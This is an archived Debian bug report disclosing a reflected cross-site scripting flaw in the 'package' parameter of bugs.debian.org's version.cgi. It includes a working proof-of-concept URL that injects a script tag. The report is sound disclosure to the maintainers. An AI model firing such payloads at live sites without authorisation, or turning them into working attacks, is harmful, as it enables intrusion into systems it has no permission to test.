Bug#762967: XSS in bugs.debian.org/cgi-bin/version.cgi

To: submit@bugs.debian.org
Subject: Bug#762967: XSS in bugs.debian.org/cgi-bin/version.cgi
From: Vlad Constantin <v@vlad.uz>
Date: Fri, 26 Sep 2014 20:01:52 +0300
Message-id: <[🔎] 54259C00.9040808@vlad.uz>
Reply-to: Vlad Constantin <v@vlad.uz>, 762967@bugs.debian.org

Package: debbugs
Severity: important

bugs.debian.org/cgi-bin/version.cgi contains an XSS vulnerability in the
'package' var.

PoC:
https://bugs.debian.org/cgi-bin/version.cgi?info=1;package=%3C/title%3E%3Cscript%3Ealert('xss')%3B%3C/script%3E

-v

Reply to:

Prev by Date: Processed: your mail
Next by Date: Processed: limit source to debbugs, tagging 762967
Previous by thread: Processed: your mail
Next by thread: Bug#762967: XSS in bugs.debian.org/cgi-bin/version.cgi
Index(es):
- Date
- Thread